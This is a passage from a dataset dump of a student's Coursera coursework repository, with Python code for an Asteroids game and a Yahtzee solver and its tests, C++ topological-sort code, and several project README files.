increment_angle_vel(self):\n self.angle_vel += ROTATE_STEP\n \n def decrement_angle_vel(self):\n self.angle_vel -= ROTATE_STEP\n \n def stop_rotation(self):\n self.angle_vel = 0\n \n def set_thrust(self, is_thrust_on):\n self.thrust = is_thrust_on\n \n if (is_thrust_on):\n ship_thrust_sound.play()\n else:\n ship_thrust_sound.rewind()\n \n def get_position(self):\n return self.pos\n \n def get_radius(self):\n return self.radius\n \n \n# Sprite class\nclass Sprite:\n def __init__(self, pos, vel, ang, ang_vel, image, info, sound = None):\n self.pos = [pos[0],pos[1]]\n self.vel = [vel[0],vel[1]]\n self.angle = ang\n self.angle_vel = ang_vel\n self.image = image\n self.image_center = info.get_center()\n self.image_size = info.get_size()\n self.radius = info.get_radius()\n self.lifespan = info.get_lifespan()\n self.animated = info.get_animated()\n self.age = 0\n if sound:\n sound.rewind()\n sound.play()\n \n def draw(self, canvas):\n if (self.animated):\n canvas.draw_image(self.image, [self.image_center[0] + self.image_size[0] * self.age, self.image_center[1]], \n self.image_size, self.pos, self.image_size, self.angle)\n else:\n canvas.draw_image(self.image, self.image_center, self.image_size, self.pos, \n self.image_size, self.angle)\n \n def update(self):\n \n # position update\n self.pos[0] = (self.pos[0] + self.vel[0]) % WIDTH \n self.pos[1] = (self.pos[1] + self.vel[1]) % HEIGHT \n \n # update angular position (for it to be rotating)\n self.angle += self.angle_vel\n \n # increment the age\n self.age += 1\n \n # check to see if the age of the sprite has exceeded its lifespan\n if (self.age < self.lifespan):\n return False\n else:\n return True\n \n def get_position(self):\n return self.pos\n \n def get_radius(self):\n return self.radius\n \n def get_velocity(self):\n return self.vel\n \n def get_angle(self):\n return self.angle\n \n def get_angle_vel(self):\n return self.angle_vel\n \n def collide(self, other_object):\n if (dist(self.pos, other_object.get_position()) <= self.radius + other_object.get_radius()):\n return True\n else:\n return False\n \n\n \ndef draw(canvas):\n global time, started, lives, score, a_rock_group, an_explosion, vel_multiplier\n \n # animiate background\n time += 1\n wtime = (time / 4) % WIDTH\n center = debris_info.get_center()\n size = debris_info.get_size()\n canvas.draw_image(nebula_image, nebula_info.get_center(), nebula_info.get_size(), [WIDTH / 2, HEIGHT / 2], [WIDTH, HEIGHT])\n canvas.draw_image(debris_image, center, size, (wtime - WIDTH / 2, HEIGHT / 2), (WIDTH, HEIGHT))\n canvas.draw_image(debris_image, center, size, (wtime + WIDTH / 2, HEIGHT / 2), (WIDTH, HEIGHT))\n\n # draw the score\n canvas.draw_text(\"Score: \" +str(score), (WIDTH/10.0, HEIGHT/10.0), 30, 'white')\n canvas.draw_text(\"Lives: \" +str(lives), (WIDTH * 8/10.0, HEIGHT/10.0), 30, 'white')\n \n \n # draw and update ships\n my_ship.draw(canvas)\n my_ship.update()\n \n # draw and update the group of sprite\n process_sprite_group(a_rock_group, canvas)\n process_sprite_group(a_missile_group, canvas)\n process_sprite_group(an_explosion_group, canvas)\n \n # draw splash screen if not started\n if not started:\n canvas.draw_image(splash_image, splash_info.get_center(), \n splash_info.get_size(), [WIDTH / 2, HEIGHT / 2], \n splash_info.get_size())\n \n else:\n # check for collision between ship and rocks\n if group_collide(a_rock_group, my_ship):\n lives -= 1\n if (lives <= 0):\n started = False\n vel_multiplier = 1\n a_rock_group = set()\n timer.stop()\n soundtrack.rewind()\n \n # update the rock to missile collision and update the score \n score += group_group_collise(a_missile_group, a_rock_group)\n\n \n \n \ndef keydown(key):\n if (key == simplegui.KEY_MAP[\"left\"]):\n my_ship.stop_rotation()\n my_ship.decrement_angle_vel()\n elif (key == simplegui.KEY_MAP[\"right\"]):\n my_ship.stop_rotation()\n my_ship.increment_angle_vel()\n elif (key == simplegui.KEY_MAP[\"up\"]):\n my_ship.set_thrust(True)\n elif (key == simplegui.KEY_MAP[\"space\"]):\n my_ship.shoot_missile()\n\ndef keyup(key): \n if (key == simplegui.KEY_MAP[\"left\"] or key == simplegui.KEY_MAP[\"right\"]):\n my_ship.stop_rotation()\n elif (key == simplegui.KEY_MAP[\"up\"]):\n my_ship.set_thrust(False) \n \n# mouseclick handlers that reset UI and conditions whether splash image is drawn \ndef click(pos):\n global started, lives, score\n center = [WIDTH / 2, HEIGHT / 2]\n size = splash_info.get_size()\n inwidth = (center[0] - size[0] / 2) < pos[0] < (center[0] + size[0] / 2)\n inheight = (center[1] - size[1] / 2) < pos[1] < (center[1] + size[1] / 2)\n if (not started) and inwidth and inheight:\n started = True\n lives = 3\n score = 0\n timer.start()\n soundtrack.play()\n\n# timer handler that spawns a rock \ndef rock_spawner():\n global a_rock_group, vel_multiplier, score_to_change_vel\n \n if (score >= score_to_change_vel):\n score_to_change_vel += 5\n vel_multiplier += 3\n \n if (len(a_rock_group) < MAX_NUM_OF_ROCKS):\n pos = []\n vel = []\n pos.append(random.randrange(0,WIDTH))\n pos.append(random.randrange(0, HEIGHT))\n vel.append(random.random() * ((max_rock_vel - min_rock_vel) + min_rock_vel)*vel_multiplier)\n vel.append(random.random() * ((max_rock_vel - min_rock_vel) + min_rock_vel)*vel_multiplier)\n ang = random.random() * (MAX_ROCK_ANG_VEL - MIN_ROCK_ANG_VEL) + MIN_ROCK_ANG_VEL\n \n a_rock = Sprite(pos, vel, 0, ang, asteroid_image, asteroid_info);\n if dist(a_rock.get_position(), my_ship.get_position()) > 1.5 * (a_rock.get_radius() + my_ship.get_radius()):\n a_rock_group.add(Sprite(pos, vel, 0, ang, asteroid_image, asteroid_info))\n \n \n \n# initialize frame\nframe = simplegui.create_frame(\"Asteroids\", WIDTH, HEIGHT)\n\n# initialize ship and two sprites\nmy_ship = Ship([WIDTH / 2, HEIGHT / 2], [0, 0], -1.57, ship_image, ship_info)\na_rock_group = set()\na_missile_group = set()\nan_explosion_group = set()\n\n# register handlers\nframe.set_draw_handler(draw)\nframe.set_keydown_handler(keydown)\nframe.set_keyup_handler(keyup)\nframe.set_mouseclick_handler(click)\n\ntimer = simplegui.create_timer(1000.0, rock_spawner)\n\n# get things rolling\nframe.start()"
},
{
"alpha_fraction": 0.5632233619689941,
"alphanum_fraction": 0.6069155335426331,
"avg_line_length": 38.01694869995117,
"blob_id": "e2051f6bbd127d8a8978c4a53bdcb9c29be51156",
"content_id": "e914ca84fb5578165791c399dca4016acb628d13",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6912,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 177,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 1)/Mini-Project4 Game Yahtzee/game_yahtzee_testsuite.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nTesting suite for functions used in one implementation\nof Yathzee game\n\"\"\"\n# http://www.codeskulptor.org/#user46_i4ScIuelhi_93.py\nimport poc_simpletest\n \ndef run_suite_gen_all_holds(gen_all_holds):\n \"\"\"\n Some basic testing code for testing generation of all possible\n dices that can be held in Yahtzee\n \"\"\"\n \n # create a TestSuite object\n suite = poc_simpletest.TestSuite() \n \n print \"running gen_all_holds function test...\"\n \n # test the gen_all_hold\n # Test #1.1: hand is empty. Should return a set with one empty tuple\n hand = ()\n poss_holds = gen_all_holds(hand)\n # run the Test #1.1 and compare the expected vs actual output\n suite.run_test(str(len(poss_holds)), str(1), \"Test #1.1: gen_all_hold\")\n \n # Test #1.2: hand is of length one. Should return a set with two tuples\n hand = (1,)\n poss_holds = gen_all_holds(hand)\n holds_exp = set((),(1,))\n # run the Test #1.2 and compare the expected vs actual output\n suite.run_test(str(len(poss_holds.intersection(holds_exp))), str(0), \n \"Test #1.2: gen_all_hold\")\n \n # Test #1.3: hand values are distinct. Should return a set of length \n # 2^(lenght of hand)\n hand = (0,1,2)\n poss_holds = gen_all_holds(hand)\n holds_exp = set((), (0,), (1,), (2,), (0,1), (0,2), (1,2), (0,1,2))\n # run the Test #1.3 and compare the expected vs actual output\n suite.run_test(str(len(poss_holds.intersection(holds_exp))), str(0), \n \"Test #1.3: gen_all_hold\")\n \n # Test #1.4: hand values are all same.\n hand = (1,1,1)\n poss_holds = gen_all_holds(hand)\n holds_exp = set((), (1,), (1,1), (1,1,1))\n # run the Test #1.4 and compare the expected vs actual output\n suite.run_test(str(len(poss_holds.intersection(holds_exp))), str(0), \n \"Test #1.4: gen_all_hold\")\n \n # Test #1.5: hand values have some distinct and some repeated values.\n hand = (1,1,1,2,5)\n poss_holds = gen_all_holds(hand)\n holds_exp = set((), (1,), (2,), (5,), (1,1), (1,2), (1,5), (2,5), \n (1,1,1), (1,1,2), (1,1,5), (1,2,5), (1,1,1,2), \n (1,1,1,5), (1,1,2,5), (1,1,2,5))\n # run the Test #1.5 and compare the expected vs actual output\n suite.run_test(str(len(poss_holds.intersection(holds_exp))), str(0), \n \"Test #1.5: gen_all_hold\")\n \n # report number of tests and failures\n suite.report_results()\n print\n \ndef run_suite_score(score):\n \"\"\"\n Some basic testing code for testing score function \n for the Yahtzee dice game\n \"\"\"\n \n # create a TestSuite object\n suite = poc_simpletest.TestSuite() \n \n print \"running score function test...\"\n \n # test the score function of Yahtzee \n # Test #2.1: hand is empty. Should return a score zero\n hand = ()\n max_score = score(hand)\n # run the Test #2.1 and compare the expected vs actual output\n suite.run_test(str(max_score), str(0), \"Test #2.1: score\")\n \n # Test #2.2: hand has one value. Should return this value\n hand = (4,)\n max_score = score(hand)\n # run the Test #2.2 and compare the expected vs actual output\n suite.run_test(str(max_score), str(4), \"Test #2.2: score\")\n \n # Test #2.3: hand has all same values. Should return this \n # value time its number of occurances\n hand = (4,4,4,4)\n max_score = score(hand)\n # run the Test #2.3 and compare the expected vs actual output\n suite.run_test(str(max_score), str(16), \"Test #2.3: score\")\n \n # Test #2.4: hand some repeated values. Should return this \n # maxim value in the hnad times its number of occurances\n hand = (1,2,2,2,3,6,6)\n max_score = score(hand)\n # run the Test #2.4 and compare the expected vs actual output\n suite.run_test(str(max_score), str(12), \"Test #2.4: score\")\n \n # report number of tests and failures\n suite.report_results()\n print \n \ndef run_suite_expected_value(expected_value):\n \"\"\"\n Some basic testing code for expected value function \n to be used in best strategy for play a Yahtzee game\n \"\"\"\n \n # create a TestSuite object\n suite = poc_simpletest.TestSuite() \n \n print \"running expected_value function test...\"\n \n # test the exptected_value\n # Test #1.1: no die is held and number of free dice to roll\n # is zero. Should return zero expected value\n held_die = ()\n num_die_sides = 6\n num_free_dice = 0\n exp_value = expected_value(held_die, num_die_sides, num_free_dice)\n # run the Test #1.1 and compare the expected vs actual output\n suite.run_test(str(exp_value), str(0.0), \"Test #1.1: expected_value\")\n \n # Test #1.2: one die is held and number of free dice to roll\n # is zero. Should return that value of that die\n held_die = (1,)\n num_die_sides = 6\n num_free_dice = 0\n exp_value = expected_value(held_die, num_die_sides, num_free_dice)\n # run the Test #1.2 and compare the expected vs actual output\n suite.run_test(str(exp_value), str(1.0), \"Test #1.2: expected_value\")\n \n # Test #1.3: no die is held and number of free dice to roll\n # is 1. Should return that expected value of rolling all \n # possible combination of 1 die which for a 6 sided die\n # is 3.5\n held_die = ()\n num_die_sides = 6\n num_free_dice = 1\n exp_value = expected_value(held_die, num_die_sides, num_free_dice)\n # run the Test #1.3 and compare the expected vs actual output\n suite.run_test(str(exp_value), str(3.5), \"Test #1.3: expected_value\")\n \n # Test #1.4: one die of value 3 with 6 sides is held and number \n # of free dice to roll is 1. Should return the expected value \n # calculated as follows:\n # 1/6 * score(1,3)+ 1/6 * score(2,3) + 1/6 * score(3,3) +...\n # ...+ 1/6 * score (3,6) \n # = 1/6 * 3 + 1/6 * 3 + 1/6 * 6 +...+ 1/6 * 6 = 4.5\n held_die = (3,)\n num_die_sides = 6\n num_free_dice = 1\n exp_value = expected_value(held_die, num_die_sides, num_free_dice)\n # run the Test #1.4 and compare the expected vs actual output\n suite.run_test(str(exp_value), str(4.5), \"Test #1.4: expected_value\")\n \n # Test #1.5: two dies with value 2 with 6 sides is held and number \n # of free dice to roll is 2. Should return the expected value \n # calculated as follows:\n # 1/36 * score(1,1,2,2) + 1/36 * score(1,2,2,2) + 1/36 * score(1,2,2,3)\n # +...+ 1/36 * score(1,2,2,6) + 1/36 * score(1,2,2,2) +\n # 1/36 * score(2,2,2,2) + 1/36 * score(2,2,2,3) +...\n # = sum of all 36 values\n held_die = (2,2)\n num_die_sides = 6\n num_free_dice = 2\n exp_value = expected_value(held_die, num_die_sides, num_free_dice)\n # run the Test #1.5 and compare the expected vs actual output\n suite.run_test(str(round(exp_value,3)), str(5.833), \"Test #1.5: expected_value\")\n \n # report number of tests and failures\n suite.report_results()\n print \n \n"
},
{
"alpha_fraction": 0.7532394528388977,
"alphanum_fraction": 0.7684506773948669,
"avg_line_length": 109.9375,
"blob_id": "227ae9b5b12229c3634cf46dd937151d3764cb8b",
"content_id": "bdc962e58fbb42561cc42436ed333a0ca34afd33",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1775,
"license_type": "no_license",
"max_line_length": 435,
"num_lines": 16,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 2)/Mini-Project4 Fifteen Puzzle/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Mini-project #4 Fifteen Puzzles\n\nDeveloped the logic to solve the Fifteen Puzzles game in CodeSkulptor, a browser-based Python interpreter, as part of the coursework. To see the solver in action, go [here](http://www.codeskulptor.org/#user46_p9CLHFUXsW_56.py) and press the play button on the top left corner. A window will pop up, with the unshuffled puzzle. Use arrow key to shuffle the puzzle as desired and then press the Solve button to visually solve the puzzle.\n\nLink to my test suite for the implementation:\n<http://www.codeskulptor.org/#user46_ZoVa3j3l3k_66.py>\n\nMini-project overview taken from course page can be found below:\n* This week's homework introduced you to the Fifteen puzzle and outlined the highlights of building a solver for the puzzle. As described in the homework, the solution process for a puzzle of size <a href=\"https://www.codecogs.com/eqnedit.php?latex=m&space;\\times&space;n\" target=\"_blank\"><img src=\"https://latex.codecogs.com/gif.latex?m&space;\\times&space;n\" title=\"m \\times n\" /></a> has three phases:\n\n1. Solve the bottom m-2 rows of the puzzle in a row by row manner from bottom to top. Each individual row will be solved in a right to left order.\n2. Solve the rightmost n-2 columns of the top two rows of the puzzle (in a right to left order). Each column consists of two unsolved positions and will be solved in a bottom to top order.\n3. Solve the upper left <a href=\"https://www.codecogs.com/eqnedit.php?latex=2&space;\\times&space;2\" target=\"_blank\"><img src=\"https://latex.codecogs.com/gif.latex?2&space;\\times&space;2\" title=\"2 \\times 2\" /></a> portion of the puzzle directly.\n\nComplete project description can be found at : \n<https://www.coursera.org/learn/principles-of-computing-2/supplement/08FqM/mini-project-description>\n"
},
{
"alpha_fraction": 0.7752858400344849,
"alphanum_fraction": 0.7832013964653015,
"avg_line_length": 112.5999984741211,
"blob_id": "f42639bbd59cf6b4a4de291b232f46b667097e2f",
"content_id": "2e7b2a80d3ad710a3ff1541b3dc9d48c47cd30e2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2284,
"license_type": "no_license",
"max_line_length": 608,
"num_lines": 20,
"path": "/Fundamentals of Computing Specialization/Interactive Programming in Python (Part 1)/Mini-Project1 Rock-paper-scissors-lizard-Spock/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Mini-project #1 - Rock-paper-scissors-lizard-Spock\n\nImplemented the another version of the classic rock-paper-scissors game in CodeSkulptor, a browser-based Python interpreter, as part of the coursework. To play the game go [here](http://www.codeskulptor.org/#user46_xghMO1JnR7_2.py) and press the play button on the top left corner. A call to each of the five options--rock, paper, scissors, lizard, Spock, has already added in the code and the computer's choice is then randomly chosen with the result of the game printed on the console on the right. Rules for the modified version of rock-paper-scissors game can be found below in the mini-project overview:\n\nMini-project overview taken from course page can be found below:\n* Rock-paper-scissors-lizard-Spock (RPSLS) is a variant of Rock-paper-scissors that allows five choices. Each choice wins against two other choices, loses against two other choices and ties against itself. Much of RPSLS's popularity is that it has been featured in 3 episodes of the TV series \"The Big Bang Theory\". The Wikipedia entry for RPSLS gives the complete description of the details of the game.\n\n* In our first mini-project, we will build a Python function rpsls(name) that takes as input the string name, which is one of \"rock\", \"paper\", \"scissors\", \"lizard\", or \"Spock\". The function then simulates playing a round of Rock-paper-scissors-lizard-Spock by generating its own random choice from these alternatives and then determining the winner using a simple rule that we will next describe.\n\n* \"While Rock-paper-scissor-lizard-Spock has a set of ten rules that logically determine who wins a round of RPSLS, coding up these rules would require a large number (5x5=25) of if/elif/else clauses in your mini-project code. A simpler method for determining the winner is to assign each of the five choices a number:\n\t* 0 — rock\n\t* 1 — Spock\n\t* 2 — paper\n\t* 3 — lizard\n\t* 4 — scissors\n\n* In this expanded list, each choice wins against the preceding two choices and loses against the following two choices (if rock and scissors are thought of as being adjacent using modular arithmetic).\n\nComplete Mini-Project Description can be found at: \n<https://www.coursera.org/learn/interactive-python-1/supplement/ijRP5/mini-project-description>\n\n\n"
},
{
"alpha_fraction": 0.6144601106643677,
"alphanum_fraction": 0.6178939342498779,
"avg_line_length": 32.29299545288086,
"blob_id": "3e65b027fea2416de2ca6f0543ab1cd1f17fc846",
"content_id": "788c17698866b8875428df3788f3e3e9c37e07ce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5242,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 157,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 1)/Mini-Project4 Game Yahtzee/game_yahtzee.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nYahtzee dice game fuction implmentation\nfor determining optimal strategy of playing\nSimplifications: only allow discard and roll, only score against upper level\n\"\"\"\n\n# Used to increase the timeout, if necessary\nimport codeskulptor\ncodeskulptor.set_timeout(20)\n\ndef gen_all_sequences(outcomes, length):\n \"\"\"\n Iterative function that enumerates the set of all sequences of\n outcomes of given length.\n \"\"\"\n \n answer_set = set([()])\n for dummy_idx in range(length):\n temp_set = set()\n for partial_sequence in answer_set:\n for item in outcomes:\n new_sequence = list(partial_sequence)\n new_sequence.append(item)\n temp_set.add(tuple(new_sequence))\n answer_set = temp_set\n return answer_set\n\n\ndef score(hand):\n \"\"\"\n Compute the maximal score for a Yahtzee hand according to the\n upper section of the Yahtzee score card.\n\n hand: sorted tuple representing full yahtzee hand\n\n Returns an integer score \n \"\"\"\n # initialize the local variables\n max_score = 0\n idx = 0\n # iterate over the hand\n while idx < len(hand):\n # find number of occurances for the value at current index\n # in hand\n num_occur = hand.count(hand[idx])\n # update the maximal score if conidition is met\n if num_occur * hand[idx] > max_score:\n max_score = num_occur * hand[idx]\n # bipass all occurances of the current value in hand to \n # the next index with a different value\n idx += num_occur\n \n return max_score\n\n\ndef expected_value(held_dice, num_die_sides, num_free_dice):\n \"\"\"\n Compute the expected value based on held_dice given that there\n are num_free_dice to be rolled, each with num_die_sides.\n\n held_dice: dice that you will hold\n num_die_sides: number of sides on each die\n num_free_dice: number of dice to be rolled\n\n Returns a floating point expected value\n \"\"\"\n # initialize local variables\n exp_score = 0\n # calculate all dice outcomes that can be rolled on a single die\n dice_outcomes = range(1, num_die_sides + 1)\n # calculate all possible combination dice that can be rolled\n # for num_free_dice\n poss_rolls = gen_all_sequences(dice_outcomes, num_free_dice)\n # iterate over all of these combinations and calculate the\n # expected score on concatenated held dice and\n # current possible dice roll combination\n for roll in poss_rolls:\n temp_roll = sorted(list(roll)+list(held_dice))\n exp_score += (1.0/((num_die_sides)**num_free_dice) * score(tuple(temp_roll)))\n \n return exp_score\n\n\ndef gen_all_holds(hand):\n \"\"\"\n Generate all possible choices of dice from hand to hold.\n\n hand: full yahtzee hand in the form of sorted tuple\n\n Returns a set of tuples, where each tuple is dice to hold\n \"\"\"\n # initialize local variables\n ans = set([()])\n # interate over all hand items\n for hand_item in hand:\n # for each possible dice hold combination for the hand \n # already added, calculate a new hold combination by \n # adding the current hand_item to it\n for hold in set(ans):\n new_hold = list(hold)\n new_hold.append(hand_item)\n ans.add(tuple(new_hold))\n return ans\n \n\n\ndef strategy(hand, num_die_sides):\n \"\"\"\n Compute the hold that maximizes the expected value when the\n discarded dice are rolled.\n\n hand: full yahtzee hand in the form of sorted tuple\n num_die_sides: number of sides on each die\n\n Returns a tuple where the first element is the expected score and\n the second element is a tuple of the dice to hold\n \"\"\"\n # initial local variables\n max_exp_score = 0\n # generate all possible holds\n poss_holds = gen_all_holds(hand)\n # iterate over all holds and find the max_exp_score\n # and the corresponding dice to hold\n for hold in poss_holds:\n curr_hold_exp_score = expected_value(hold, num_die_sides, \n len(hand) - len(hold))\n if curr_hold_exp_score > max_exp_score:\n max_exp_score = curr_hold_exp_score\n max_exp_hold = hold\n\n return (max_exp_score, max_exp_hold)\n\n###################################################################\n# example function call to strategy function \n# uncomment to run it\n###################################################################\n#def run_example():\n# \"\"\"\n# Compute the dice to hold and expected score for an example hand\n# \"\"\"\n# num_die_sides = 6\n# hand = (2,2)\n# hand_score, hold = strategy(hand, num_die_sides)\n# print \"Best strategy for hand\", hand, \"is to hold\", hold, \"with expected score\", hand_score\n# \n# \n#run_example()\n\n\n##################################################################\n# uncomment the below functions to run the test suit for the above\n# functions\n##################################################################\n#import user46_i4ScIuelhi_91 as poc_yahtzee_testsuite\n#poc_yahtzee_testsuite.run_suite_gen_all_holds(gen_all_holds)\n#poc_yahtzee_testsuite.run_suite_score(score)\n#poc_yahtzee_testsuite.run_suite_expected_value(expected_value)\n\n\n \n \n\n\n\n"
},
{
"alpha_fraction": 0.5517449975013733,
"alphanum_fraction": 0.5826104283332825,
"avg_line_length": 32.42361068725586,
"blob_id": "3189f0a3ba72feff402f4194d67d9e9355decabd",
"content_id": "94fd72217b661fa06ccf0d9558e1e9063d28e545",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4971,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 144,
"path": "/Algorithms on Graphs/Assignment2/toposort.cpp",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "// file: toposort.cpp\r\n// author: Shamsuddin Rehmani\r\n// date: 2016-07-03\r\n// description: Problem 2 of the second assignment of Algorithms on Graphs\r\n//\t\t\t\tby University of California, San Diego & Higher School of Economics on Coursera\r\n//\r\n// The task was : Compute a topological ordering of a given directed \r\n//\t\t\t\tacyclic graph (DAG) with n vertices and m edges \r\n// \r\n//\t\t\t\tStarter file with main function was already provided but implementation of\r\n//\t\t\t\tDFS and acyclic functions and testing had to be completed\r\n//\t\t\t\t\r\n//\t\t\t\tThe file passed all test cases on Coursera with\r\n//\t\t\t\tmax time used: 0.17/2.00 sec, max memory used: 37347328/536870912 bytes. \r\n\r\n#include <iostream>\r\n#include <vector>\r\n#include <algorithm> \r\n//#include <ctime>\r\n\r\nusing std::vector;\r\n\r\n// Recursively performs depth first search starting from a given vertice x and adds all the reachable\r\n// vertices to a vector \"order\" starting from the sink vertice (i.e. add all vertices in post order manner)\r\n//\r\n// PRE: 1 ≤ adj.size() ≤ 10e5; used.size() = adj.size(), used[i] = 0 for all 0 <= i < used.size();\r\n//\t\torder.size() = 0 ; 0 ≤ x ≤ adj.size()-1; \r\n// POST: \"order\" contains all vertices reachable from x (including x) in post order manner.\r\n//\t\t used[i] = 1 for all i = v where v = x OR/AND v = reachable vertice from x.\r\n// PARAM: adj = an undirected graph represented in adjacancey list with n vertices and 2*m edges where n is adj.size() \r\n//\t\t used = keeps track of all the vertices that have already been visited\r\n//\t\t order = used to store all the visited vertices from source vertice x in post order \r\n//\t\t x = a vertice of adj \r\n\r\nvoid dfs(vector<vector<int> > &adj, vector<int> &used, vector<int> &order, int x) {\r\n\t\r\n\t//if the vertice has not been visited and is a sink\r\n\tif (used[x] == 0 && adj[x].size() == 0) {\r\n\t\tused[x] = 1;\t\t\t//mark as visited\r\n\t\torder.push_back(x);\t\t//push it to the back of order vector\r\n\t\treturn;\t\t\t\t\t\r\n\t}\r\n\telse if (used[x] == 0) {\r\n\t\tused[x] = 1;\t\t\t//else mark the vertice as visited\r\n\r\n\t\t// perfrom a depth first search on neighbour vertices reachable from x\r\n\t\tfor (vector<int>::size_type v = 0; v < adj[x].size(); v++) {\r\n\r\n\t\t\tif (used[adj[x][v]] == 0)\r\n\r\n\t\t\t\tdfs(adj, used, order, adj[x][v]);\r\n\t\t}\r\n\r\n\t\torder.push_back(x);\r\n\t}\r\n\r\n\r\n}\r\n\r\n// Uses dfs helper function above to output the topological ordering for a given DAG adj\r\n//\r\n// PRE: 1 ≤ adj.size() ≤ 10e5; \r\n// POST: Outputs a vector with the vertices of DAG in topological ordering (i.e reverse post order) \r\n// PARAM: adj = an undirected acyclic graph represented in adjacancey list with n vertices and 2*m \r\n//\t\t edges where n is adj.size() \r\n\r\nvector<int> toposort(vector<vector<int> > adj) {\r\n\r\n\tvector<int> used(adj.size(), 0);\r\n\tvector<int> order;\r\n\r\n\r\n\t// for all vertices starting from vertice zero\r\n\t// populate the order vector containing all the visited vertices in\r\n\t// post order manner\r\n\tfor (vector<int>::size_type v = 0; v < adj.size(); v++) {\r\n\r\n\t\tif (used[v] == 0)\r\n\t\t\tdfs(adj, used, order, v);\r\n\r\n\t}\r\n\r\n\t// reverse the order to get the topological ordering\r\n\tstd::reverse(order.begin(), order.end());\r\n\t\r\n\r\n\treturn order;\r\n}\r\n\r\nint main() {\r\n\t\r\n\tsize_t n, m;\r\n\tstd::cin >> n >> m;\r\n\tvector<vector<int> > adj(n, vector<int>());\r\n\tfor (size_t i = 0; i < m; i++) {\r\n\t\tint x, y;\r\n\t\tstd::cin >> x >> y;\r\n\t\tadj[x - 1].push_back(y - 1);\r\n\t}\r\n\tvector<int> order = toposort(adj);\r\n\tfor (size_t i = 0; i < order.size(); i++) {\r\n\t\tstd::cout << order[i] + 1 << \" \";\r\n\t}\r\n\t\r\n\t// A test case to check if the clustering function works. These are commented since the \r\n\t// assignment requires the clustering.cpp file to read input values and output the respective\r\n\t// results on the console\r\n\t/******************************************************************************************\r\n\t//Test 1: output should be '4 3 1 2'\r\n\tvector<vector<int> > adj1(4, vector<int>());\r\n\tadj1[4 - 1].push_back(1 - 1);\r\n\tadj1[3 - 1].push_back(1 - 1);\r\n\tadj1[1 - 1].push_back(2 - 1);\r\n\tvector<int> order1 = toposort(adj1);\r\n\tfor (size_t i = 0; i < order1.size(); i++) {\r\n\t\tstd::cout << order1[i] + 1 << \" \";\r\n\t}\r\n\tstd::cout << std::endl;\r\n\r\n\t//Test 2: output should be '5 4 3 2 1'\r\n\tvector<vector<int> > adj2(5, vector<int>());\r\n\tadj2[4 - 1].push_back(1 - 1);\r\n\tadj2[4 - 1].push_back(3 - 1);\r\n\tadj2[3 - 1].push_back(1 - 1);\r\n\tadj2[3 - 1].push_back(2 - 1);\r\n\tadj2[5 - 1].push_back(3 - 1);\r\n\tadj2[5 - 1].push_back(2 - 1);\r\n\tadj2[2 - 1].push_back(1 - 1);\r\n\tvector<int> order2 = toposort(adj2);\r\n\tfor (size_t i = 0; i < order2.size(); i++) {\r\n\t\tstd::cout << order2[i] + 1 << \" \";\r\n\t}\r\n\tstd::cout << std::endl;\r\n\r\n\tvector<vector<int> > adj3(100000, vector<int>());\r\n\tvector<int> order3 = toposort(adj3);\r\n\tfor (size_t i = 0; i < order3.size(); i++) {\r\n\t\tstd::cout << order3[i] + 1 << \" \";\r\n\t}\r\n\tstd::cout << std::endl;\r\n\r\n\t********************************************************************************************************************/\r\n\t\r\n}\r\n"
},
{
"alpha_fraction": 0.804724395275116,
"alphanum_fraction": 0.8104987144470215,
"avg_line_length": 118.125,
"blob_id": "3e726036781a4f3cc44a548f9a6507d406887ecf",
"content_id": "497de9ebaef21a06105c7d7afbf1f5ac3886849c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1905,
"license_type": "no_license",
"max_line_length": 721,
"num_lines": 16,
"path": "/Fundamentals of Computing Specialization/Algorithmic Thinking (Part 2)/Module 4/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Project and Application Overviews\n## Project #4: Computing Alignments of Sequences\n\n* In Project 4, we will implement four functions. The first pair of functions will return matrices that we will use in computing the alignment of two sequences. The second pair of functions will return global and local alignments of two input sequences based on a provided alignment matrix. You will then use these functions in Application 4 to analyze two problems involving comparison of similar sequences.\n\nComplete project description can be found at : \n<https://www.coursera.org/learn/algorithmic-thinking-2/supplement/0AJya/project-4-description>\n\n## Application #4: Applications to Genomics and Beyond\n\n* In Project 4, you implemented dynamic programming algorithms for determining both global and local alignments of pairs of sequences. In this Application, we will demonstrate the utility of these algorithms in two domains. In the first part of the Application, we examine an interesting problem from genomics. (This is based on \"Introduction to Computational Genomics\", by Nello Cristianini and Matthew W. Hahn). We will compare two sequences that have diverged from a common ancestor sequence due to mutation. (Mutation here includes base-pair substitution, which changes the sequence content, and insertion/deletion, which change the sequence lengths.) In the second part of the Application, we consider words that have spelling mistakes.\n\nFor the genomics part of the Application, you will load several protein sequences and an appropriate scoring matrix. For the spelling correction part of the Application, you will load a provided word list. To simplify these tasks, you are welcome to use this [provided code](http://www.codeskulptor.org/#alg_application4_provided.py).\n\nComplete application description can be found at : \n<https://www.coursera.org/learn/algorithmic-thinking-2/supplement/eQpUY/application-4-description>"
},
{
"alpha_fraction": 0.7016987204551697,
"alphanum_fraction": 0.7184991836547852,
"avg_line_length": 43.768802642822266,
"blob_id": "9481912d1525198d0adcd4584fb8cafa92abdb07",
"content_id": "20a32165ccfce24405508596b002baadd61fe8e2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 16071,
"license_type": "no_license",
"max_line_length": 98,
